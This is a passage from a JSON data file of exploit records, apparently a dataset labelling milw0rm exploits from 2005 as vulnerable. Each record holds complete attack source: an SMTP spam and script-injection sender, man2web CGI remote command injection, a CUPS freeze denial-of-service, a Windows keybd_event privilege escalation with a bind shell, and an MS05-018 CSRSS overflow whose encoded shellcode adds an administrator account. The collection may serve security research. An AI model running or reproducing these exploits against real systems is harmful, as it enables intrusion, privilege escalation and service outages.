1014        "content": "#!usr/bin/perl\n\n#\n\n#    FREE SMTP Spam Filter Exploit\n\n# ------------------------------------\n\n#  Infam0us Gr0up - Securiti Research\n\n#\n\n# Info: infamous.2hell.com\n\n# Vendor URL: http://www.softstack.com/\n\n# \n\n\n\nuse IO::Socket;\n\nuse Socket;\n\n\n\nprint(\"\\n   FREE SMTP Spam Filter Exploit\\n\");\n\nprint(\" ---------------------------------\\n\\n\");\n\n\n\n# Changes to own feed \n\n$helo = \"mail.test\"; # HELO\n\n$mfrom = \"[support@vuln.test]\"; # MAIL FROM\n\n$rcpto = \"[root@localhost]\"; # RCPT TO\n\n$date = \"11 Feb 2099 12:07:10\"; # Date\n\n$from = \"Micro SEX's\"; # From mailer\n\n$subject = \"Check the new version.. \u00ae\u00ae\u00ae\\n\".\n\n\"[b]VICKY VETTE[/b][i]is HOT Editon.Check it OUT!!. Free Nude Shop. Sex,video,picture,toys and XXX Chat Adults live!!![/i]\".\n\n\"[br][a href=http://127.0.0.1 onMouseOver=alert(document.cookie);]Click Here[/a]\"; # subject spammmer\n\n\n\nif($#ARGV < 0 | $#ARGV > 1) { \n\ndie \"usage: perl $0 [IP/host] \\nExam: perl $0 127.0.0.1 \\n\" };\n\n\n\n$adr = $ARGV[0];\n\n$prt = \"25\";\n\n\n\n# Don't changes this one\n\n$act1 = \"\\x48\\x45\\x4c\\x4f $helo\";\n\n$act2 = \"\\x4d\\x41\\x49\\x4c \\x46\\x52\\x4f\\x4d\\x3a$mfrom\";\n\n$act3 = \"\\x52\\x43\\x50\\x54 f\\x54\\x4f\\x3a$rcpto\";\n\n$act4 = \"\\x44\\x41\\x54\\x41\";\n\n$act5 = \"\\x44\\x61\\x74\\x65\\x3a $date\";\n\n\n\n$sub = \n\n\"\\x46\\x72\\x6f\\x6d\\x3a $from\".\n\n\"\\x53\\x75\\x62\\x6a\\x65\\x63\\x74\\x3a $subject\\x2e\".\n\n\"\\x51\\x55\\x49\\x54\";\n\n\n\nprint \"[+] Connect to $adr..\\n\";\n\n$remote = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>$adr,\n\nPeerPort=>$prt, Reuse=>1) or die \"[-] Error: can't connect to $adr:$prt\\n\";\n\nprint \"[+] Connected!\\n\";\n\n$remote->autoflush(1);\n\nprint \"[*] Send HELO..\";\n\nprint $remote \"$act1\" or die \"\\n[-] Error: can't send xploit code\\n\";\n\nsleep(1);\n\nprint \"[OK]\\n\";\n\nprint \"[*] Send MAIL FROM..\";\n\nprint $remote \"$act2\" or die \"\\n[-] Error: can't send xploit code\\n\";\n\nsleep(1);\n\nprint \"[OK]\\n\";\n\nprint \"[*] Send RCPT TO..\";\n\nprint $remote \"$act3\" or die \"\\n[-] Error: can't send xploit code\\n\";\n\nsleep(1);\n\nprint \"[OK]\\n\";\n\nprint \"[*] Send DATA..\";\n\nprint $remote \"$act4\" or die \"\\n[-] Error: can't send xploit code\\n\";\n\nsleep(1);\n\nprint \"[OK]\\n\";\n\nprint \"[*] Send DATE..\";\n\nprint $remote \"$act5\" or die \"\\n[-] Error: can't send xploit code\\n\";\n\nsleep(1);\n\nprint \"[OK]\\n\";\n\nprint \"[*] Send Sub Mail..\";\n\nprint $remote \"$sub\" or die \"\\n[-] Error: can't send xploit code\\n\";\n\nprint \"[OK]\\n\";\n\nprint \"[*] QUIT..\\n\";\n\nprint \"[+] MAIL SPAMWNED!\\n\\n\";\n\nclose $remote;\n\nprint \"press any key to exit..\\n\";\n\n$bla= [STDIN];\n\n\n\n# milw0rm.com [2005-09-02]",
1015        "vulnerable": true
1016    },
1017    {
1018        "exploit_id": 1194,
1019        "content": "/*\n\n * str0ke@server:~$ ./test some.edu \"w\" /cgi-bin/man2web 80 1\n\n * /str0ke\n\n */\n\n \n\n /* dl-mancgi.c v0.2\n\n  * x86/linux multipie man2web cgi-scripts remote command spawn\n\n  * found and coded by tracewar\t(darklogic team)\t\t \n\n  * for educaional purposes only.                                  \n\n  *****************************************************************\t\n\n  * greetz goes to:\t\t\t\t\t\t\n\n  * matan peretz, ofer shaked, setuid, alex, majestic \n\n  */\n\n \n\n \n\n #include <stdio.h>\n\n #include <sys/types.h>\n\n #include <sys/socket.h>\n\n #include <netinet/in.h>\n\n #include <netdb.h>\n\n \n\n void usage(char *argv0) {\n\n         fprintf(stderr, \"x86/linux multipie man2web cgi-scripts remote command spawn\\n\");\n\n \tfprintf(stderr, \"researched by tracewar\\n\");\n\n \tfprintf(stderr, \"targets: \\n0=man-cgi\\n1=man2web\\n2=man2html\\n\\n\");\n\n \tfprintf(stderr, \"usage: %s <remote_host> <command> <path> <http server port> <target>\\n\", argv0);\n\n         fprintf(stderr, \"example:\");\n\n \tfprintf(stderr, \" %s 1.2.3.4 w /cgi-bin/man-cgi 80 0\\n\",argv0);\n\n         exit(0);\n\n }\n\n \n\n int main(int argc, char **argv) {\n\n         int sock, i, j, len = 0;\n\n         struct sockaddr_in serv_addr;\n\n         struct hostent *crap;\n\n \tchar *cp, dummy[50000], buffer[2000] = \"GET \";\t\n\n         if(argc < 6)\n\n            usage(argv[0]);\n\n \tif(atoi(argv[5]) == 0) {\n\n \t\t\tmemset(dummy, 0x00, 50000);\n\n \t\t\tstrcat(dummy, argv[3]);\n\n \t\t\tstrcat(dummy, \"?-P \");\n\n \t\t\tstrcat(dummy, argv[2]);\n\n \t\t\tstrcat(dummy, \" ls\");} \n\n \telse if(atoi(argv[5]) == 1) {\n\n               \t\tmemset(dummy, 0x00, 50000);\n\n              \t\tstrcat(dummy, argv[3]);\n\n             \t \tstrcat(dummy, \"?program=-P \");\n\n            \t        strcat(dummy, argv[2]);\n\n            \t        strcat(dummy, \" ls\");}\n\n \telse if(atoi(argv[5]) == 2) {\n\n \t\t\tmemset(dummy, 0x00, 50000);\n\n \t\t\tstrcat(dummy, argv[3]);\n\n \t\t\tstrcat(dummy, \"?section=-P\");\n\n \t\t\tstrcat(dummy, argv[2]);\n\n \t\t\tstrcat(dummy, \"&topic=w\");}\n\n \telse\n\n \t\tusage(argv[0]);\n\n \n\n \tprintf(\"# crafting buffer string ... \");\n\n          for(i=0, j=4;i < strlen(dummy);i++) {\n\n \t\tif(dummy[i] == ' ') {\n\n \t\t\tstrcat(buffer, \"%20\");\n\n \t\t\tj+=3;}\n\n \t\telse {\n\n \t\t\tbuffer[j] = dummy[i];\n\n \t\t\tj++;}\n\n \t}\n\n         \n\n \tstrcat(buffer, \"\\r\\n\");\n\n         printf(\"(done)\\n\");\n\n         sock = socket(AF_INET, SOCK_STREAM, 0);\n\n         if(sock < 0)\n\n                 return printf(\"# error creating socket.\\n\");\n\n         crap = gethostbyname(argv[1]);\n\n         if(crap == NULL)\n\n                 return printf(\"# cant resolve the specified hostname: %s\\n\", argv[1]);\n\n         else\n\n                 printf(\"# connecting to victim... \");\n\n \n\n         serv_addr.sin_family = AF_INET;\n\n \tserv_addr.sin_port = htons(atoi(argv[4]));\n\n         bcopy((char *)crap->h_addr, (char *)&serv_addr.sin_addr.s_addr, crap->h_length);\n\n \n\n         if (connect(sock, &serv_addr, sizeof(serv_addr)) < 0)\n\n                 return printf(\"(error)\\n# check again %s:%d\\n\", argv[1], atoi(argv[3]));\n\n \n\n         printf(\"(done)\\n# sending crafted string... \");\n\n         if( (send(sock, buffer, strlen(buffer), 0)) == -1 )\n\n                 return printf(\"\\n# error while sending the crafted string.!\\n\");\n\n         printf(\"(done)\\n# waiting for our call ...\\n\");\n\n \tmemset(buffer, 0x00, 2000);\n\n \tmemset(dummy, 0x00, 50000);\n\n \tprintf(\"\\n\\n\");\n\n \twhile(recv(sock, buffer, 2000, 0) > 0)\n\n \t\tstrcat(dummy, buffer);\n\n \n\n \tcp = &dummy[0];\n\n \ti = 0; j = 0;\n\n \tlen = strlen(dummy);\n\n \n\n         if(atoi(argv[5]) == 0) {\n\n                 while(strncmp(cp, \"<hr>\", 4) && i < len) {\n\n                         cp++;\n\n                         i++;\n\n                 }\n\n                 cp+=4;\n\n                 while(strncmp(cp, \"<hr>\", 4) && strncmp(cp, \"<A\", 2) && j < len) {\n\n \t\t\tj++;\n\n                         cp++;\n\n \t\t}\n\n                 *cp = '\\0';\n\n                 cp = &dummy[0] + i + 4;\n\n         }\n\n \n\n         else if(atoi(argv[5]) == 1) {\n\n                 while(strncmp(cp, \"\\<pre\\>\", 5) && i < len) {\n\n                         cp++;\n\n                         i++;\n\n                 }\n\n                 cp+=4;\n\n                 while(strncmp(cp, \"pre\", 3) && j < len) {\n\n \t\t\tj++;\n\n                         cp++;\n\n \t\t}\n\n                 *cp = '\\0';\n\n                 cp = &dummy[0] + i + 6;\n\n         }\n\n \n\n         else if(atoi(argv[5]) == 2) {\n\n                 while(strncmp(cp, \"PRE\", 3) && i < len) {\n\n                         cp++;\n\n                         i++;\n\n                 }\n\n                 cp+=2;\n\n                 while(strncmp(cp, \"PRE\", 3) && j < len) {\n\n \t\t\tj++;\n\n                         cp++;\n\n \t\t}\n\n                 *cp = '\\0';\n\n                 cp = &dummy[0] + i + 2;\n\n         }\n\n \n\n \tif(*cp == '\\0')\n\n \t\treturn printf(\"# Bad response from the server.\\n\");\n\n \n\n         printf(\"%s\", cp);\n\n \tprintf(\"\\n\\n\");\n\n         close(sock);\n\n         return 0;\n\n }\n\n\n\n// milw0rm.com [2005-09-04]",
1020        "vulnerable": true
1021    },
1022    {
1023        "exploit_id": 1196,
1024        "content": "/* dl-cups.c v0.1\n\n * CUPS server freeze and processor load \"fuckup\" exploit\n\n * bug found and exploit coded by tracewar  (darklogic team)\n\n * for educaional purposes only.\n\n *****************************************************************\n\n * greetz goes to:\n\n * setuid, matan.\n\n */\n\n\n\n#include <stdio.h>\n\n#include <sys/types.h>\n\n#include <sys/socket.h>\n\n#include <netinet/in.h>\n\n#include <netdb.h>\n\n\n\nchar EVIL[] = \"\\x2e\\x2e\\x5c\\x2e\\x2e\";\n\n\n\nvoid usage(char *argv0) {\n\n\tfprintf(stdout, \"cups/1.x server freeze and remote cpu usage fuckup\\n\");\n\n\tfprintf(stdout, \"exploit coded and bug found by tracewar of darklogic\\n\\n\");\n\n\tfprintf(stdout, \"usage: %s remote_host remote_port\\n\", argv0);\n\n\texit(0);\n\n}\n\n\n\nint main(int argc, char **argv) {\n\n\tchar\tbuffer[50] = \"GET /\";\n\n\tint\tsock;\n\n        struct\tsockaddr_in\tserv_addr;\n\n        struct\thostent\t*crap;\n\n\n\n\tif(argc != 3)\n\n\t\tusage(argv[0]);\n\n\n\n\tprintf(\"# Making our evil buffer... \");\t\n\n\tsnprintf(&buffer[5], 47, \"%s\", EVIL);        \n\n\tstrcat(buffer, \"\\r\\n\");\n\n\tprintf(\"(done)\\n\");\n\n\n\n        sock = socket(AF_INET, SOCK_STREAM, 0);\n\n        if(sock < 0)\n\n                return printf(\"# error creating socket.\\n\");\n\n        crap = gethostbyname(argv[1]);\n\n        if(crap == NULL)\n\n                return printf(\"# cant resolve the specified hostname: %s\\n\", argv[1]);\n\n        else\n\n                printf(\"# connecting to victim... \");\n\n\n\n        serv_addr.sin_family = AF_INET;\n\n        serv_addr.sin_port = htons(atoi(argv[2]));\n\n        bcopy((char *)crap->h_addr, (char *)&serv_addr.sin_addr.s_addr, crap->h_length);\n\n\n\n        if (connect(sock, &serv_addr, sizeof(serv_addr)) < 0)\n\n                return printf(\"(error)\\n# check again %s:%d\\n\", argv[1], atoi(argv[2]));\n\n\n\n        printf(\"(done)\\n# sending crafted string... \");\n\n        if( (send(sock, buffer, strlen(buffer), 0)) == -1 )\n\n                return printf(\"\\n# error while sending the crafted string.!\\n\");\n\n\tclose(sock);\n\n        return puts(\"(done)\\n# The server should be frozen now with 100\\% cpu usage.\");\n\n\n\n}\n\n\n\n// milw0rm.com [2005-09-05]",
1025        "vulnerable": true
1026    },
1027    {
1028        "exploit_id": 1197,
1029        "content": "/*\n\n * Microsoft Windows keybd_event validation vulnerability.\n\n *          Local privilege elevation\n\n *\n\n * Credits:    Andres Tarasco ( aT4r _@_ haxorcitos.com )\n\n *             I\u00f1aki Lopez    ( ilo _@_ reversing.org )\n\n *\n\n * Platforms afected/tested:\n\n *\n\n *     - Windows 2000\n\n *     - Windows XP\n\n *     - Windows 2003\n\n *\n\n *\n\n * Original Advisory: http://www.haxorcitos.com\n\n *                    http://www.reversing.org  \n\n *\n\n * Exploit Date: 08 / 06 / 2005\n\n *\n\n * Orignal Advisory:\n\n * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED \"AS IS\"\n\n * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION\n\n * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.\n\n *\n\n * Attack Scenario:\n\n *\n\n * a) An attacker who gains access to an unprivileged shell/application executed\n\n * with the application runas.\n\n * b) An attacker who gains access to a service with flags INTERACT_WITH_DESKTOP\n\n *\n\n * Impact:\n\n *\n\n * Due to an invalid keyboard input validation, its possible to send keys to any\n\n * application of the Desktop.\n\n * By sending some short-cut keys its possible to execute code and elevate privileges\n\n * getting loggued user privileges and bypass runas/service security restriction.\n\n *\n\n * Exploit usage:\n\n *\n\n * C:\\>whoami\n\n * AQUARIUS\\Administrador\n\n *\n\n * C:\\>runas /user:restricted cmd.exe\n\n * Escribir contrase\u00f1a para restricted:\n\n * Intentando iniciar \"cmd.exe\" como usuario \"AQUARIUS\\restricted\"...\n\n *\n\n *\n\n * Microsoft Windows 2000 [Versi\u00f3n 5.00.2195]\n\n * (C) Copyright 1985-2000 Microsoft Corp.\n\n *\n\n * C:\\WINNT\\system32>cd \\\n\n *\n\n * C:\\>whoami\n\n * AQUARIUS\\restricted\n\n *\n\n * C:\\>tlist.exe |find \"explorer.exe\"\n\n * 1140 explorer.exe      Program Manager\n\n *\n\n * C:\\>c:\\keybd.exe 1140\n\n * HANDLE Found. Attacking =)\n\n *\n\n * C:\\>nc localhost 65535\n\n * Microsoft Windows 2000 [Versi\u00f3n 5.00.2195]\n\n * (C) Copyright 1985-2000 Microsoft Corp.\n\n *\n\n * C:\\>whoami\n\n * whoami\n\n * AQUARIUS\\Administrador\n\n *\n\n *\n\n * DONE =)\n\n *\n\n */\n\n\n\n#include <stdio.h>\n\n#include <string.h>\n\n#include <winsock2.h>\n\n#pragma comment(lib, \"ws2_32.lib\")\n\n\n\n#define HAXORCITOS 65535\n\nunsigned int pid = 0;\n\nchar buf[256]=\"\";\n\n\n\n/**************************************************************/\n\nvoid ExplorerExecution (HWND hwnd, LPARAM lParam){\n\n\tDWORD hwndid;\n\n    int i;\n\n\n\n\n\n\tGetWindowThreadProcessId(hwnd,&hwndid);\n\n\n\n\tif (hwndid == pid){\n\n    /*\n\n      Replace keybd_event with SendMessage() and PostMessage() calls \n\n    */\n\n        printf(\"HANDLE Found. Attacking =)\\n\");\n\n        SetForegroundWindow(hwnd);\n\n        keybd_event(VK_LWIN,1,0,0);\n\n        keybd_event(VkKeyScan('r'),1,0,0);\n\n        keybd_event(VK_LWIN,1,KEYEVENTF_KEYUP,0);\n\n        keybd_event(VkKeyScan('r'),1,KEYEVENTF_KEYUP,0);\n\n        for(i=0;i<strlen(buf);i++) {\n\n            if (buf[i]==':') {\n\n                keybd_event(VK_SHIFT,1,0,0);\n\n                keybd_event(VkKeyScan(buf[i]),1,0,0);\n\n                keybd_event(VK_SHIFT,1,KEYEVENTF_KEYUP,0);\n\n                keybd_event(VkKeyScan(buf[i]),1,KEYEVENTF_KEYUP,0);\n\n            } else {\n\n                if (buf[i]=='\\\\') {\n\n                    keybd_event(VK_LMENU,1,0,0);\n\n                    keybd_event(VK_CONTROL,1,0,0);\n\n                    keybd_event(VkKeyScan('\u00ba'),1,0,0);\n\n                    keybd_event(VK_LMENU,1,KEYEVENTF_KEYUP,0);\n\n                    keybd_event(VK_CONTROL,1,KEYEVENTF_KEYUP,0);\n\n                    keybd_event(VkKeyScan('\u00ba'),1,KEYEVENTF_KEYUP,0);\n\n                } else {\n\n                    keybd_event(VkKeyScan(buf[i]),1,0,0);\n\n                    keybd_event(VkKeyScan(buf[i]),1,KEYEVENTF_KEYUP,0);\n\n                }\n\n            }\n\n        }\n\n        keybd_event(VK_RETURN,1,0,0);\n\n        keybd_event(VK_RETURN,1,KEYEVENTF_KEYUP,0);\n\n        exit(1);\n\n    }\n\n}\n\n/**************************************************************/\n\n\n\nint BindShell(void) { //Bind Shell. POrt 65535\n\n\n\n\tSOCKET\t\t\t\ts,s2;\n\n\tSTARTUPINFO\t\t\tsi;\n\n    PROCESS_INFORMATION pi;\n\n\tWSADATA\t\t\t\tHWSAdata;\n\n\tstruct\t\t\t\tsockaddr_in sa;\n\n\tint\t\t\t\t\tlen;\n\n\n\n\tif (WSAStartup(MAKEWORD(2,2), &HWSAdata) != 0) { exit(1); }\n\n\tif ((s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0))==INVALID_SOCKET){ exit(1); }\n\n\n\n    sa.sin_family\t\t= AF_INET;\n\n    sa.sin_port\t\t\t= (USHORT)htons(HAXORCITOS);\n\n    sa.sin_addr.s_addr\t= htonl(INADDR_ANY);\n\n    len=sizeof(sa);\n\n    if ( bind(s, (struct sockaddr *) &sa, sizeof(sa)) == SOCKET_ERROR ) { return(-1); }\n\n    if ( listen(s, 1) == SOCKET_ERROR ) { return(-1); }\n\n    s2 = accept(s,(struct sockaddr *)&sa,&len);\n\n    closesocket(s);\n\n\n\n\tZeroMemory( &si, sizeof(si) );  ZeroMemory( &pi, sizeof(pi) );\n\n\tsi.cb\t\t\t= sizeof(si);\n\n\tsi.wShowWindow  = SW_HIDE;\n\n    si.dwFlags\t\t=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;\n\n    si.hStdInput\t= (void *) s2; // SOCKET\n\n    si.hStdOutput\t= (void *) s2;\n\n    si.hStdError\t= (void *) s2;\n\n    if (!CreateProcess( NULL ,\"cmd.exe\",NULL, NULL,TRUE, 0,NULL,NULL,&si,&pi)) {\n\n        doFormatMessage(GetLastError());\n\n        return(-1);\n\n    }\n\n\n\n    WaitForSingleObject( pi.hProcess, INFINITE );\n\n\tclosesocket(s);\n\n\tclosesocket(s2);\n\n    printf(\"SALIMOS...\\n\");\n\n    Sleep(5000);\n\n    return(1);\n\n\n\n\n\n}\n\n/**************************************************************/\n\nvoid main(int argc, char* argv[])\n\n{\n\n    HWND console_wnd = NULL;\n\n    \n\n\tif (argc >= 2) {\n\n        pid = atoi (argv[1]);\n\n        strncpy(buf,argv[0],sizeof(buf)-1);\n\n\t    EnumWindows((WNDENUMPROC)ExplorerExecution,(long)(&console_wnd));\n\n    } else {\n\n        BindShell();\n\n    }\n\n}\n\n/**************************************************************/\n\n\n\n// milw0rm.com [2005-09-06]",
1030        "vulnerable": true
1031    },
1032    {
1033        "exploit_id": 1198,
1034        "content": "#include <windows.h>\n\n#include <stdio.h>\n\n#include <tlhelp32.h>\n\n\n\n#pragma comment (lib,\"Advapi32.lib\")\n\n\n\ntypedef struct _CONSOLE_STATE_INFO    {      \n\n\t  /* 0x00 */  DWORD cbSize;\n\n      /* 0x04 */  COORD ScreenBufferSize;\n\n      /* 0x08 */  COORD WindowSize;\n\n      /* 0x0c */  POINT WindowPosition;\n\n      /* 0x14 */  COORD FontSize;\n\n      /* 0x18 */  DWORD FontFamily;\n\n      /* 0x1c */  DWORD FontWeight;\n\n      /* 0x20 */  WCHAR FaceName[0x200];\n\n} CONSOLE_STATE_INFO, *PCONSOLE_STATE_INFO;\n\n\n\ntypedef struct xxx\n\n{\n\n\tDWORD\tdw[6];\n\n\tchar\tcmd[0x50];\n\n}address_and_cmd;\n\n\n\nchar decoder[]=\n\n\"\\x8b\\xdc\"\n\n\"\\xBE\\x44\\x59\\x41\\x53\\x46\\xBF\\x44\\x59\\x34\\x53\\x47\\x43\\x39\\x33\\x75\"\n\n\"\\xFB\\x83\\xC3\\x04\\x80\\x33\\x97\\x43\\x39\\x3B\\x75\\xF8\\x45\\x59\\x41\\x53\";\n\n//user=e\n\n//pass=asd#321\n\nchar add_user[]=\n\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x8D\\x7b\\x98\\xFF\\x77\\x14\\x6A\\x00\\x68\"\n\n\"\\x2A\\x04\\x00\\x00\\xFF\\x17\\x8B\\xD8\\x6A\\x04\\x68\\x00\\x10\\x00\\x00\\x68\"\n\n\"\\x00\\x01\\x00\\x00\\x6A\\x00\\x53\\xFF\\x57\\x04\\x8B\\xF0\\x6A\\x00\\x68\\x00\"\n\n\"\\x01\\x00\\x00\\x8D\\x47\\x18\\x50\\x56\\x53\\xFF\\x57\\x08\\x33\\xC0\\x50\\x50\"\n\n\"\\x56\\xFF\\x77\\x10\\x50\\x50\\x53\\xFF\\x57\\x0C\";\n\nchar decode_end_sign[]=\"EY4S\";\n\nchar sc[0x200];\n\n\n\nchar\tszConsoleTitle[256];\n\n\n\nDWORD search_jmpesp()\n\n{\n\n\tchar szDLL[][30] = {\"ntdll.dll\",\n\n\t\t\t\t\t\t\"kernel32.dll\",\n\n\t\t\t\t\t\t\"user32.dll\",\n\n\t\t\t\t\t\t\"gdi32.dll\",\t\t\t\t\t\t\n\n\t\t\t\t\t\t\"winsrv.dll\",\n\n\t\t\t\t\t\t\"csrsrv.dll\",\n\n\t\t\t\t\t\t\"basesrv.dll\"};\n\n\tint\t\ti,y;\n\n\tBOOL\tdone;\n\n\tHMODULE\th;\n\n\tBYTE\t*ptr;\n\n\tDWORD\taddr=0;\n\n\n\n\tfor(i=0;i<sizeof(szDLL)/sizeof(szDLL[0]);i++)\n\n\t{\n\n\t\tdone = FALSE;\n\n\t\th = LoadLibrary(szDLL[i]);\n\n\t\tif(h == NULL) \n\n\t\t\tcontinue;\n\n\t\tprintf(\"[+] start search \\\"FF E4\\\" in %s\\n\", szDLL[i]);\n\n\t\tptr = (BYTE *)h;\n\n\t\tfor(y = 0;!done;y++) \n\n\t\t{ \n\n\t\t\t__try \n\n\t\t\t{ \n\n\t\t\t\tif(ptr[y] == (BYTE)'\\xFF' && ptr[y+1] == (BYTE)'\\xE4') \n\n\t\t\t\t{ \n\n\t\t\t\t\taddr = (int)ptr + y; \n\n\t\t\t\t\tdone = TRUE;\n\n\t\t\t\t\tprintf(\"[+] found \\\"FF E4\\\"(jmp esp) in %X[%s]\\n\", addr, szDLL[i]);\n\n\t\t\t\t} \n\n\t\t\t} \n\n\t\t\t__except(EXCEPTION_EXECUTE_HANDLER)\n\n\t\t\t{\n\n\t\t\t\tdone = TRUE; \n\n\t\t\t} \n\n\t\t} \n\n\t\tFreeLibrary(h);\n\n\t\tif(addr) break;\n\n\t}\n\n\treturn addr;\n\n}\n\nBOOL make_shellcode(DWORD dwTargetPid)\n\n{\n\n\tHMODULE\thKernel32;\n\n\taddress_and_cmd\taac;\n\n\tint\t\ti=0, j=0, size=0;\n\n\n\n\thKernel32 = LoadLibrary(\"kernel32.dll\");\n\n\tif(!hKernel32) return FALSE;\n\n\taac.dw[0] = (DWORD)GetProcAddress(hKernel32, \"OpenProcess\");\n\n\taac.dw[1] = (DWORD)GetProcAddress(hKernel32, \"VirtualAllocEx\");\n\n\taac.dw[2] = (DWORD)GetProcAddress(hKernel32, \"WriteProcessMemory\");\n\n\taac.dw[3] = (DWORD)GetProcAddress(hKernel32, \"CreateRemoteThread\");\n\n\taac.dw[4] = (DWORD)GetProcAddress(hKernel32, \"WinExec\");\n\n\taac.dw[5] = dwTargetPid;\n\n\n\n\tmemset(aac.cmd, 0, sizeof(aac.cmd));\n\n\tstrcpy(aac.cmd, \"cmd /c net user e asd#321 /add && net localgroup administrators e /add\");\n\n\n\n\t//encode\n\n\tstrcpy(sc, decoder);\n\n\tfor(i=0;i<sizeof(add_user);i++)\n\n\t\tadd_user[i]^=(BYTE)'\\x97';\n\n\tstrcat(sc, add_user);\n\n\tfor(i=0;i<sizeof(aac);i++)\n\n\t\t((char *)&aac)[i]^=(BYTE)'\\x97';\n\n\tsize=strlen(sc);\n\n\tmemcpy(&sc[size], (char *)&aac, sizeof(aac));\n\n\tsize+=sizeof(aac);\n\n\tsc[size]='\\x0';\n\n\tstrcat(sc, decode_end_sign);\n\n\n\n\treturn TRUE;\n\n}\n\n\n\nvoid exploit(HWND hwnd,\tDWORD dwPid)\n\n{\n\n\tHANDLE\t\t\t\thFile;\n\n\tLPVOID\t\t\t\tlp;\n\n\tint\t\t\t\t\ti, index;\n\n\tDWORD\t\t\t\tdwJMP;\n\n\tCONSOLE_STATE_INFO\tcsi;\n\n\n\n\n\n\tmemset((void *)&csi, 0, sizeof(csi));\n\n\tcsi.cbSize = sizeof(csi);\n\n\tcsi.ScreenBufferSize.X = 0x0050;\n\n\tcsi.ScreenBufferSize.Y = 0x012c;\n\n\tcsi.WindowSize.X = 0x0050;\n\n\tcsi.WindowSize.Y=0x0019;\n\n\tcsi.WindowPosition.x = 0x58;\n\n\tcsi.WindowPosition.y = 0x58;\n\n\tcsi.FontSize.X = 0;\n\n\tcsi.FontSize.Y=0xc;\n\n\tcsi.FontFamily = 0x36;\n\n\tcsi.FontWeight = 0x190;\n\n\t\n\n\tfor(i=0;i<0x58;i++)\n\n\t\t((char *)csi.FaceName)[i] = '\\x90';\n\n\tdwJMP = search_jmpesp();\n\n\tif(!dwJMP)\n\n\t{\n\n\t\tprintf(\"[-] search FF E4 failed.\\n\");\n\n\t\treturn;\n\n\t}\n\n\tmemcpy(&((char *)csi.FaceName)[0x58], (char *)&dwJMP, 4);\n\n\tfor(i=0;i<0x20;i++)\n\n\t\tstrcat((char *)csi.FaceName, \"\\x90\");\n\n\tindex = strlen((char *)csi.FaceName);\n\n\n\n\tif(!make_shellcode(dwPid)) return;\n\n\tmemcpy(&((char *)csi.FaceName)[index], (char *)sc, strlen(sc));\n\n\n\n\thFile = CreateFileMappingW((void *)0xFFFFFFFF,0,4,0,csi.cbSize,0);\n\n\tif(!hFile)\n\n\t{\n\n\t\tprintf(\"[-] CreateFileMapping failed:%d\\n\", GetLastError());\n\n\t\treturn;\n\n\t}\n\n\tprintf(\"[+] CreateFileMapping OK!\\n\");\n\n\tlp = MapViewOfFile(hFile, 0x0F001F,0,0,0);\n\n\tif(!lp)\n\n\t{\n\n\t\tprintf(\"[-] MapViewOfFile failed:%d\\n\", GetLastError());\n\n\t\treturn;\n\n\t}\n\n\tprintf(\"[+] MapViewOfFile OK!\\n\");\n\n\t//copy\n\n\tmemcpy((unsigned short *)lp, (unsigned short *)&csi, csi.cbSize);\n\n\n\n\tprintf(\"[+] Send Exploit!\\n\");\n\n\tSendMessageW(hwnd,0x4C9,(WPARAM)hFile,0);\n\n}\n\n\n\nvoid main(int argc, char **argv)\n\n{\n\n\tDWORD\tdwRet;\n\n\tHWND\thwnd = NULL;\n\n\tDWORD\tdwPid = 0;\n\n\tHANDLE hSnapshot = NULL;\n\n\tPROCESSENTRY32\t\tpe;\n\n\n\n\tprintf( \"MS05-018 windows CSRSS.EXE Stack Overflow exp v1.0\\n\"\n\n\t\t\t\"Affect: Windows 2000 sp3/sp4 (all language)\\n\"\n\n\t\t\t\"Coded by eyas <eyas at xfocus.org>\\n\"\n\n\t\t\t\"http://www.xfocus.net\\n\\n\");\n\n\t\n\n\tif(argc==2)\n\n\t{\n\n\t\tdwPid = atoi(argv[1]);\n\n\t}\n\n\telse\n\n\t{\n\n\t\tprintf(\"Usage: %s pid\\n\\n\", argv[0]);\n\n\t\thSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\n\n\t\tpe.dwSize = sizeof(PROCESSENTRY32);\n\n\t\tProcess32First(hSnapshot,&pe);\n\n\t\tdo\n\n\t\t{\t\t\n\n\t\t\tif( strcmpi(pe.szExeFile, \"WINLOGON.EXE\") == 0)\n\n\t\t\t{\n\n\t\t\t\tprintf(\"[+] PID=%d Process=%s\\n\", pe.th32ProcessID, pe.szExeFile);\n\n\t\t\t}\n\n\t\t}\n\n\t\twhile(Process32Next(hSnapshot,&pe)==TRUE);\n\n\t\tCloseHandle (hSnapshot);\n\n\t}\n\n\n\n\tif(!dwPid)\treturn;\n\n\n\n\tif(!FreeConsole())\n\n\t\tprintf(\"[-] FreeConsole failed:%d\\n\", GetLastError());\n\n\telse\n\n\t{\n\n\t\tprintf(\"[+] FreeConsole ok.\\n\");\n\n\t\tif(!AllocConsole())\n\n\t\t\tprintf(\"[-] AllocConsole failed:%d\\n\", GetLastError());\n\n\t\telse\n\n\t\t\tprintf(\"[+] AllocConsole ok.\\n\");\n\n\t}\n\n\n\n\tdwRet = GetConsoleTitle(szConsoleTitle, sizeof(szConsoleTitle));\n\n\tif(dwRet)\n\n\t{\n\n\t\tprintf(\"[+] Get Console Title OK:\\\"%s\\\"\\n\", szConsoleTitle);\n\n\t}\n\n\telse\n\n\t{\n\n\t\tprintf(\"[-] Get Console Title failed.\\n\");\n\n\t\treturn;\n\n\t}\n\n\n\n\thwnd = FindWindow(\"ConsoleWindowClass\",szConsoleTitle); \n\n\tif(hwnd)\n\n\t\tprintf(\"[+] bingo! found hwnd=%X\\n\", hwnd);\n\n\telse\n\n\t{\n\n\t\tprintf(\"[-] can't found hwnd!\\n\");\n\n\t\treturn;\n\n\t}\n\n\n\n\texploit(hwnd, dwPid);\n\n\tprintf(\"[+] Done.\\n\");\n\n}\n\n\n\n// milw0rm.com [2005-09-06]",
1035        "vulnerable": true
1036    },
1037    {
1038        "exploit_id": 1199,
